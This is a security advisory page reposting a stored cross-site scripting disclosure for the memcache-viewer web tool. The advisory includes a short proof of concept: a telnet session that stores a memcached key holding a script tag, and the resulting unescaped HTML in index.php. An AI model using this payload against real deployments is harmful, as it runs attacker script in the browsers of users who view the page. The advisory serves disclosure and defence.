memcache-viewer Cross Site Scripting

2017.02.26
Credit: HaHwul
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: memcache-viewer - Stored XSS # Date: 2017-02-24 # Exploit Author: HaHwul # Exploit Author Blog: www.hahwul.com # Vendor Homepage: https://github.com/chrisjameskirkham/memcache-viewer # Software Link: https://github.com/chrisjameskirkham/memcache-viewer/archive/master.zip # Version: Latest commit # Tested on: Debian [wheezy] ### Vulnerability This program does not filter filtering on the special character when expressing the data from memcached on the web. When XSS attacks and HTML code are inserted in the memcached, user who accesses the page will run the XSS code. ### Example Attack code 1. Send Payload(XSS Code) after Connecting to memcached server. #> telnet 127.0.0.1 11211 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. add hacked<script>alert(45)</script> 0 900 2 45 STORED 2. Insert data through memcached related 3rd party application. ### Result Access index.php after memcache-viewer login DOM Area in index.php <td class="key">hacked<script>alert(45)</script></td><td class="slab">2</td><td class="size">2</td>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top